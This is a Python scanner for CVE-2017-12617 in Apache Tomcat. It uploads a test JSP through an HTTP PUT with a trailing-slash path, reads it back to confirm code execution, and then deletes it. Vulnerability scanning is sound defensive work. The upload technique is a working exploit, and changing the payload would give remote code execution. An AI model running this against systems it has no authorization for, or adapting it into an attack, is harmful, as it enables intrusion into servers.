Scan for CVE-2017-12617
import argparse
import itertools
import logging
import requests
import sys
import threading
import urllib3
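class Scanner(object):
    """Check hosts for CVE-2017-12617 by writing, reading back and removing a test JSP.

    For every host the scanner tries HTTPS on 443/8443 and HTTP on 80/8080.
    A target is reported when an HTTP PUT of a small JSP is accepted (2xx)
    and a following GET of the same path returns the marker text.

    TLS certificate validation is disabled (``verify=False``) on every
    request, so the results say nothing about the identity of the server
    that answered.
    """

    def __init__(self, hosts, loglevel=logging.WARNING):
        """Store the targets and set up the per-class logger.

        Args:
            hosts: iterable of host names or addresses; duplicates are dropped.
            loglevel: level applied to this scanner's logger.
        """
        self.hosts = set(hosts)
        # (scheme, host, port) tuples for which the marker was read back.
        self.vulnerable = []
        self.path = '/dmarttest.jsp'
        self.headers = {'Connection': 'close'}
        # Seconds allowed per request; one value for PUT, GET and DELETE so
        # a silent host cannot stall the whole run.
        self.timeout = 2
        self.logger = logging.getLogger(self.__class__.__name__)
        self.logger.setLevel(loglevel)

    @staticmethod
    def gen(host):
        """Return the (scheme, host, port) combinations probed for *host*."""
        https_targets = list(itertools.product(['https'], [host], [443, 8443]))
        http_targets = list(itertools.product(['http'], [host], [80, 8080]))
        return https_targets + http_targets

    def run(self):
        """Probe every host/port combination and record the ones that respond as vulnerable.

        Returns None; results are logged at WARNING and collected in
        ``self.vulnerable``.
        """
        # NOTE(review): the listing lost its indentation; the trailing
        # ``return`` is read here as ending run() after all hosts were tried.
        for _host in self.hosts:
            for host in self.gen(_host):
                self._check(host)

    def _check(self, host):
        """Run the PUT / GET / DELETE sequence against one (scheme, host, port) tuple."""
        url = '{}://{}:{}'.format(*host) + self.path
        try:
            self.logger.debug('{} (PUT)...'.format(url))
            pr = requests.put(url + '/', headers=self.headers, data='<% out.println("hello");%>',
                              timeout=self.timeout, verify=False)
        except Exception as e:
            # Closed ports and TLS failures are expected while sweeping; keep
            # the reason at debug level instead of dropping it.
            self.logger.debug('{} (PUT) failed: {}'.format(url, e))
            return
        self.logger.debug('{} (PUT) -> {} {}'.format(url, pr.status_code, pr.reason))
        if not (200 <= pr.status_code < 300):
            return

        # From here on the test file may exist on the target, so removal runs
        # whatever the outcome of the GET.
        try:
            try:
                self.logger.debug('{} (GET)'.format(url))
                pg = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False)
            except Exception as e:
                self.logger.debug('{} (GET) failed: {}'.format(url, e))
                return
            # Log the GET response (the original logged the PUT response here).
            self.logger.debug('{} (GET) -> {} {}'.format(url, pg.status_code, pg.reason))
            self.logger.debug(pg.text)
            # NOTE(review): 'hello' also occurs in the uploaded source, so a
            # server that stores the file and returns it unexecuted matches
            # as well; the accepted PUT is still the finding in that case.
            if 'hello' in pg.text:
                self.logger.warning('VULNERABLE: {}'.format(host))
                self.vulnerable.append(host)
        finally:
            self._cleanup(url)

    def _cleanup(self, url):
        """Delete the uploaded test file and warn when the target may still hold it."""
        try:
            dr = requests.delete(url + '/', headers=self.headers, timeout=self.timeout, verify=False)
        except Exception as e:
            self.logger.warning('{} (DELETE) failed, test file may remain: {}'.format(url, e))
            return
        self.logger.debug('{} (DELETE) -> {} {}'.format(url, dr.status_code, dr.reason))
        if not (200 <= dr.status_code < 300):
            self.logger.warning('{} (DELETE) -> {}, test file may remain'.format(url, dr.status_code))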
def main():
    """Read the host list named on the command line and scan every entry.

    The file is split on any whitespace, so hosts may be separated by
    newlines or spaces. The scanner is created with DEBUG logging.
    """
    cli = argparse.ArgumentParser()
    cli.add_argument('list', help='Name of a file containing a list of hosts to check')
    options = cli.parse_args()

    with open(options.list) as handle:
        targets = handle.read().split()

    Scanner(targets, loglevel=logging.DEBUG).run()
if __name__ == '__main__':
    logging.basicConfig(level=logging.WARNING)
    # Mirror log records into "<script name>.log" next to the console output.
    logfile_handler = logging.FileHandler(sys.argv[0] + '.log')
    root_logger = logging.getLogger()
    root_logger.addHandler(logfile_handler)
    # The scanner sends every request with verify=False; this silences the
    # urllib3 warnings that would otherwise be printed for each of them.
    urllib3.disable_warnings()
    main()